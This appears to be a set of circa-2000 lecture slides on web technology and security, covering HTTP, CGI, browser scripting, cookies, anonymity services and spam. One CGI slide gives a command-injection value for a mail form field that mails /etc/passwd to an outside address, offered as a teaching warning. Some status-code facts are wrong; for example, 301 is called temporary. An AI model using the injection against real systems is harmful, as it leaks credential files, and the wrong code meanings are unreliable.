world wide web technology

World Wide Web Technology• Request-response paradigm:

HTTP HyperText Transfer Protocol• HTTP is a typical TCP/IP protocol:

– Textual representation: both requests and responses have a textual representation so that a human can diagnose the protocol.

– Standard error codes: Internet convention says:

1xx: command received and being processed

2xx: success

3xx: further action is needed

4xx: temporary error

5xx: permanent error

(HTTP has some slight deviations, see later)

HTTP Example• HTTP 1.0 request:

GET /index.html HTTP/1.0From: [email protected]: Mozilla 4.74...Accept: text/plainAccept: text/html

... other fields ...

< empty line marks end of request >

HTTP Example (cont.)• HTTP 1.0 reply:

HTTP/1.0 200 OKDate: Mon, 08 Aug 2000 20:48:51 GMTServer: Apache/1.3.4Last-Modified: Wed, 23 Sep 1999 ...Content-Length: 3173Accept-Ranges: bytesConnection: closeContent-Type: text/html

< empty line >

< The content of the document follows>

HTTP Response Codes• 1xx: request received, processing continues.

(Such response is followed by another one.)

• 2xx: success, result depends on the code:– 200: OK, result follows.– 201: An entity was created as a result of the

request.

• 3xx: further processing needed:– 300: Multiple choices, client must select one.– 301: Moved temporarily.– 304: Not modified (since date given in request).

HTTP Response Codes• 4xx: client error:

– 400: Malformed request.– 401: Unauthorized, authorization required.– 402: Payment required (not yet supported).– 403: Forbidden, authorization will not help.– 404: Not found. (Resource temporarily or

permanently unavailable.)

• 5xx: server error:– 500: Internal server error (unexpected by server).– 503: Service unavailable (due to overload, …)

see: RFC 2068

http://www.normos.org/ietf/rfc/rfc2068.txt

HTTP Threats from result codes• HTTP is very susceptible to “man in the

middle” attacks. Examples:– 200: Since HTTP uses cleartext, the content of

a document can be subtly altered. (The Content-Length must be kept correct though!)

– 301: A browser can be fooled into loading from a different server, without the user knowing it.

– 401: A user can be “tricked” into giving his password. Basic authentication transmits the password without encryption. (The newer digest authentication performs encryption.)

HTTP Basics• HTTP/1.0 uses a TCP/IP connection for

each request.– HTTP/1.0 wastes resources because opening

and closing connections is expensive.– Subsequent requests to the same server seem to

form a session, but because they are separate TCP/IP connections the (non-existent) session can easily be broken into.

– Browsers (Netscape Navigator, Internet Explorer, ...) issue several requests in parallel to retrieve in-line images “faster”. This actually constitutes a denial of service attack.

HTTP Basics• HTTP/1.1 solves some 1.0 problems:

– Support for multi-part content, meaning that only one request is needed to retrieve several objects at once.

– Persistent connections reduce the risk of break-ins into a session, and reduce connection setup overhead. (Persistent connections may also cause a server to need many more open connections.)

– Authentication can be done through a “challenge” mechanism and “digest authentication”. A user password is not transmitted over the network.

HTTP Security Issues• HTTP allows content-coding.

Unfortunately, only compression schemes are defined, and no encryption schemes.

• Secure-HTTP (or S-HTTP) is an extension with encryption, but not well supported. It encrypts the message (and reply) body but some of the header info is not encrypted.

• HTTPS (HTTP over SSL) first creates an encrypted channel (using SSL). Subsequently request and reply headers and body are encrypted.

HTTP Security Issues (cont.)• Experimental implementations of persistent

connections in HTTP 1.0 cause denial of service. Therefore HTTP 1.1 proxy servers never open a persistent connection with an HTTP 1.0 client.

• HTTP 1.1 connections may time out. Both clients and servers must always be able to recover from asynchronous close events.

• Browsers can route requests through a proxy. Some Internet Providers use a transparent proxy: the user may not be aware of the proxy’s existence.

HTTP Security Issues (cont.)• Safe methods: GET and HEAD should not

take an action other than retrieval. (Users cannot be held accountable for side effects of these methods.)

• Forms which are used with the GET method should never ask for sensitive information, because of logging attacks.

• The Content-MD5 header can be used to add a digest (checksum) to a reply. This gives the false impression the message has not been tampered with.

HTTP Security Issues (cont.)• The behavior of a cache with authorized

requests is not always safe: a cache may return replies to non-authenticated clients.

• Sharing browser sessions on shared workstations poses the risk of authorized sessions to be taken over by the next user.

• A server may attempt to validate the identity of the user through the RFC 931 protocol. The user’s machine confirms the user name of an open connection. This technique is generally unsafe.

http://www.normos.org/ietf/rfc/rfc931.txt

Server-side Technology• Basic architecture: CGI scripts act as a

gateway between WWW server and information system (database system).

Server-side Technology• Security threats from CGI-scripts:

– The input for a CGI-script results from filling out a form. The script should anticipate erroneous input, possibly also data overrun.

– A CGI-script should check that it is invoked through the right form, by checking the HTTP_REFERER field. However, this field can be faked.

– CGI-scripts are often written in scripting languages such as Perl or Bourne-shell. Writing scripts in such languages is easy, but writing secure scripts is difficult.

Server-side Technology • Example (part of) insecure shell script:

echo $message | sendmail $mail_to

(message and mail_to are form fields)

if the user enters into the mail_to field:

[email protected];mail [email protected]</etc/passwd

this results in the password file being sent to [email protected]

Moral: do not use environment variables (that are set through forms) without quoting and without checking them.

Server-side Technology:• CGI-scripts can also be abused for denial of

service attacks:– An HTTP POST (or PUT) request can contain

an arbitrary amount of input data. This may cause several problems:

• Intermediate proxies may crash.

• The CGI-script may crash.

• The CGI-script may need a lot of memory to handle the request.

– A Web-server can be bombarded with (small) requests for CGI-scripts. The overhead can easily overload the Web-server.

Server-side Technology• Netscape: NSAPI

– In the handling of a request code can be added to the server in different places: Init, AuthTrans, NameTrans, PathCheck, ObjectType, Service, Error and AddLog.

– Errors in the user-added functions may cause the server to crash.

http://developer.netscape.com/docs/manuals/ enterprise/nsapi/index.htm

• Netscape: WAI (Web Application Interface)– Newer API to write application “wrappers”, again

through a server plug-in.

http://developer.netscape.com/docs/manuals/enterprise/nsapi/index.htm






Server-side Technology• Microsoft IIS: ISAPI

– Similar to NSAPI, with the same problem: code added to the server may cause the server to crash.

• Microsoft IIS: ASP (Active Server Pages)– Server-side scripting, in VBscript or Jscript, to

create dynamic Web content and connections with databases. (Uses an ISAPI plugin itself.)

• Microsoft IIS: IDC (Internet Database Connector)– “Extended” HTML written in .htx files– Database scripts written in .idc files (easy to create

through Frontpage editor)

Server-side Technology• Servlets: Java “equivalent” to NSAPI or

ISAPI:– User-written code is added to the (running)

server.– The Java environment ensures that errors in the

code cannot cause a server crash.– The servlet API includes facilities for

maintaining session information.– Servlets are a server-independent technology.

Many Web-servers support Java servlets.

Client-side Technology• Apart from displaying HTML pages, a

modern Web-browser can perform many other tasks:– Invoking external programs;– User-interaction through forms;– Preserving state using cookies;– Executing scripting code;– Extension of browser with plug-ins;– Execution of Java applets (plain or signed);– Execution of ActiveX controls (Windows only).

Client-side Technology• Invoking external programs:

– The HTTP reply contains a MIME-type; depending on the MIME-type the browser will:

• Display the information (e.g. for HTML, GIF, JPG).

• Use a plug-in to handle the information (see later).

• Invoke an external program to handle the information.

– The external program must already be installed on the client machine.

– The user defines which MIME-type corresponds to which program.

– The user must be careful to not allow information to be stolen or overwritten (un)intentionally.

Client-side Technology• User-interaction through forms:

– Many Web-sites offer seemingly interesting information only after the user fills out a form, which sends potentially sensitive information about the user to the Web-site.

– Form input is sent to the server as cleartext. The browser can warn the user about it, but most users disable the warnings.

– Modern browsers support form-based file upload. Users can be tricked to upload files with sensitive data.

– Beware of forms combined with scripting.

Client-side Technology• Preserving state info through Cookies:

– A server orders a browser to store info using a Set-Cookie field in an HTTP reply. (One reply may contain several Set-Cookie requests.)

– The browser returns cookies using the Cookie field in an HTTP request.

– Cookies (with valid associated path names) are shared between servers that share part of the domain name: 2 periods for .com, .edu, etc. and 3 periods for .us, .nl, .uk, .be, etc.

– Cookies are limited to 4Kbyte each, 20 Cookies per domain, 300 Cookies total.

http://www.netscape.com/newsref/std/cookie_spec.html






Client-side Technology• Javascript and VBscript:

– Scripting languages (Javascript from Netscape and VBscript from Microsoft) make Web-pages active and/or interactive.

– Actions can be triggered by user input (like button clicks, filling out a text field, etc.), by window operations (like close) and by time-outs.

– Scripting languages are used to:• Render the user’s workstation useless.

• Lure the user into typing in or uploading sensitive information.

• Lure users to the “wrong” Web-sites.

Client-side Technology• Denial of service attacks using scripting:

– Scripting languages are interpreted, which means execution is slow. A long (or infinite) may consume a large percentage of the available cpu-time.

– A simple script may loop through a large array, thus consuming a lot of memory and hence resulting in thrashing.

– A script may create extra windows upon being (un)loaded. It may re-open the window each time it is minimized or closed. A script may make it very difficult to get rid of such a window.

Client-side Technology• Obtaining sensitive information through

scripts:– There are numerous ways to lure users into

typing in what one wants them to type using forms alone.

– Scripting adds the possibility to open a popup window prompting for information.

– A script can also make suggestions in the message area (bottom of browser window).

– A script can change a file upload field before doing the upload.

Client-side Technology• Danger of powerful scripting language:

unrestricted simultaneous access to local resources and the network:– A (VB)script can read, write, create and delete

arbitrary files (for which the user has access rights).

– A script can perform complicated calculations and manipulations because it is a general-purpose programming language.

– The “mail-part” of Internet Explorer can be configured to automatically invoke scripts without requiring a “click”.

Client-side Technology• Tricking the clicks:

– A browser normally displays the destination of a link in the message area. A script can write a message by handling the mouseover event. This message may suggest a different link destination.

– Some sites are paid for through advertisements. Some advertisers want to see hits on their site. Scripts can be used to “simulate” (but really generate) hits to sites without the user actually clicking on anything.

Client-side Technology• Extending the browser with plug-ins:

– Plug-ins are modules in machine code that are “intended” for enabling a browser to display some media type in-line.

– A plug-in must be installed by the user on the client machine. Users should be very suspicious about plug-ins but most users are not.

– A plug-in can perform all operations a separate executable can, including uploading arbitrary files, installing viruses, modifying or deleting arbitrary files, crashing the browser, maybe even rebooting the operating system, etc.

Client-side Technology• Java applets: safe interactive components?

Java applets are executed within a “shielded” environment (called sandbox):– Applets cannot read or write files.– Applets can only open IP connections to their

origin site.– The Java runtime environment can perform a

limited integrity check on applets.– When an applet performs an illegal operation

the Java runtime environment catches it an generates an appropriate error message.

Client-side Technology• Java applets: safe interactive components?

– Applets can call methods of other applets that are included in the same HTML file. (They cannot find out about applets in other files.)

– Applets in different frames (or files) can communicate through static fields.

– Applets are stopped when the enclosing Web-page is being unloaded (replaced by a new page).

– Stopped applets (not on displayed pages) may be destroyed and garbage collected.

– Resource consumption by active applets may render the user’s workstation unusable.

Client-side Technology• ActiveX: Distributed Components

– ActiveX uses code signing. The supplier of an ActiveX control must provide a certificate (obtained from a trusted third party).

– The browser displays an authenticode dialog box asking the user to accept the ActiveX control.

– An accepted ActiveX control is a machine code module downloaded from a remote site. It can perform all actions that a separate program can execute (uploading, crashing, formatting hard disk, etc.)

See also: http://www.byte.com/art/9709/sec5/sec5.htm

http://www.byte.com/art/9709/sec5/sec5.htm

http://www.byte.com/art/9709/sec5/sec5.htm

Database Sessions on the Web• Database transactions consist of several

steps. When accessing a database through the Web each step takes a separate HTTP request.– The requests need to be tied to the appropriate

session (or transaction).– The session must not be broken into (even

though each request is separate).– The system needs to be able to handle long-

lived transactions but also be able to timeout when a session is inactive for a long time.

Database Sessions on the Web• Logging on to a Database through WWW:

– Logging on can be done through a form that requests for a username and password. The password will not encrypted in the request.

– The server can return a code 401 on the first database request. The browser will prompt for a username and password. With basic authentication the password will not be encrypted. With digest authentication it will.

– The browser will authenticate each subsequent request. The user must ensure to exit the browser after completing the database session.

Database Sessions on the Web• Once a session is created the browser must

be able to refer to it in each request.– The session id can be kept in a hidden field in

the form on each page.– The session id can be passed as part of the URL

of each page.– The session id can be passed through Cookies.

(Cookies are set through an HTTP reply and are stored on the client computer. They are sent back by the client on each subsequent request.)

Database Sessions on the Web• Dealing with long-lived transactions:

– When most transactions wish to succeed (e.g. customers want to buy items) one should use pessimistic concurrency control. Items are locked while they are in the customer’s shopping cart.

– When most transactions are deliberately aborted (e.g. customers put back items or leave the store, leaving their cart behind) one should use optimistic concurrency control. Items are not locked while in the customer’s shopping cart and may not be available at the cash register.

Database Connections through Java• Java applets can be used to keep a connection

to a database (or gateway) open.– JDBC-ODBC bridge: works with many database

systems.– Native-API partly-Java driver: requires specific

client API (for Oracle, Sybase, …)– Net-protocol All-Java driver: protocol between

browser and server is vendor independent.– Native-protocol All-Java driver: converts JDBC

calls to network protocol for specific DBMS. There are 2-tier and 3-tier configurations.

Database Connections through Java• JDBC-ODBC bridge:

Database Connections through Java• Native-API Partly-Java driver:

Database Connections through Java• Net-protocol All-Java driver:

Database Connections through Java• Native-Protocol All-java driver, 2-tier:

Database Connections through Java• Native-Protocol All-Java driver, 3-tier:

Privacy on the Web• The Web is not as anonymous as it looks:

– The user’s IP number, browser, operating system and other aspects may be detected. Cookies may provide additional information about the user.

– Different Web-sites may collaborate in gathering data about users by combining their logging activities.

– ISPs may log Web access distribution and provide access patterns and hit rates to Web-sites.

– Users may sometimes want to be known (e.g. to buy and pay something) and sometimes want to be anonymous.

Privacy on the Web• The Anonymizer:

– Functions as a kind of proxy server.– Accesses appear to originate from the anonymizer

site instead of the user’s IP number.– All user-related data is removed from a request.– Users are not anonymous to the anonymizer.

(And the anonymizer may be legally forced to reveal a user’s accesses.)

– Users are not anonymous to their ISP either.

See http://www.anonymizer.com/

http://www.anonymizer.com/



Privacy on the Web• Crowds: anonymously hiding in a crowd.

– Each user activates a jondo; jondo’s communicate with each other.

– Each HTTP request is forwarded to another randomly chosen jondo.

– Each received request is either forwarded to another jondo or passed onto the destination server.

– The random routing is very safe (not traceable, and no single point of failure) but may be slow.

– Crowds cannot really include members that are behind firewalls.

Privacy on the Web• Onion Routing: anonymity through

encrypted messages and routing through a network of “Mixes”.– An onion (on the client machine) determines a

path through the network. It uses a recursively layered data structure using keys of all routers on the path.

– Each router can decrypt the onion to find out the address of the next router (but not the message or the rest of the path).

– There is no single point of failure.

Privacy on the Web• LPWA: Lucent Personalized Web Assistant

– Acts as a proxy server.– Creates a different alias for a user for each

Web-site. (So collaborating Web-sites cannot detect a common user.)

– Creates a different fake (but also real) email address.

– Includes anti-spamming support by allowing to block certain fake email addresses (to which spam is being sent).

– Has a single point of failure.

Anonymous E-mail (or Netnews)• Pseudo-anonymous remailers:

– The user registers with a remailer. The remailer creates an alias (email address on his site). Mail from the user is forwarded as if it came from the alias. Mail to the alias is forwarded back to the user.

– Mail is delayed for a random period of time, so that there is no correlation between the time mail arrives at the remailer and the time it leaves the remailer.

– A trustworthy remailer will support PGP.

Anonymous E-mail (or Netnews)• True anonymous remailers:

– Cypherpunk remailers:• Messages are encrypted recursively several times.

• Each remailer strips off one layer.

– Mixmaster remailers:• Messages contain 20 encrypted headers.

• Each remailer adds its header to the back of the list, so the number of headers remains 20. (No remailer knows how many hops there are before or after itself, except for the last one who knows it must perform delivery.)

Nice intro to Cypherpunk and Mixmaster at:http://www.obscura.com/~loki/remailer/remailer-essay.html

http://www.obscura.com/~loki/remailer/remailer-essay.html









SPAM• SPAM is a collection of forms of email

abuse, including:– Trying to sell you something you don’t want.– Pyramid scams.– Chain letters.– Junk mail faked to look like it accidentally got

to you but was for someone else.– Requests for permission to send you

commercial email.– Unwanted announcements of events.

SPAM• How to recognize SPAM?

– Subject or content often speaks for itself.– Sender is a numbered/free email account.– Message asks to reply if you wish to no longer

receive mail from this sender or list.– Sender looks like a fake address.– Sender looks like a real address but clearly an

address from where this kind of message would not have been sent.

SPAM• Why do you receive SPAM?

– There are “robots” or “spiders” searching for email addresses on Web-sites, Netnews postings, mailing list archives, message boards.

– Organizations sell databases with millions of email addresses they gathered. (They use SPAM to advertise their databases…)

– If you have never announced your email address anywhere, someone else may have done it, e.g. to tell people in a newsgroup that you are knowledgeable in some subject area.

SPAM• How to avoid SPAM?

– The chances to completely avoid SPAM are small when you use the Web, Netnews, etc.

– Never write your email address.– Transform your email address in a way which is

obvious enough for humans but too difficult for mail-address-searching robots. (e.g. use [email protected])

– Do not explain how to obtain your email address from the distorted one.

– Never reply to a SPAM message!

SPAM• How to filter out SPAM?

– Block mail from sites which are “known” for spamming (some “free email” sites are often blocked, including hotmail.com, freemail.nl).

– Block mail from usernames with numbers in them.

– Delete mail with a combination of certain words or expressions in them (like “get rich” or “make * $ in * days”).

– Verify that the sender’s domain exists.

SPAM• What to do and what not to do:

– Do not send an email bomb to the sender, because in 99% of the cases the sender address was faked.

– Send a friendly message to the “postmaster” or “abuse” of the sender’s site, to warn him that the site’s name is being abused. (Do not assume the site is the origin of the SPAM.)

– Notify your ISP, who may try to trace back the real origin of the message.

– If the messages announces dubious services with phone numbers, notify the phone company.

world wide web technology

Documents

http basicshttp1

http threats

http response codes4xx

malformed request

http security issueshttp

different server

persistent connections

client error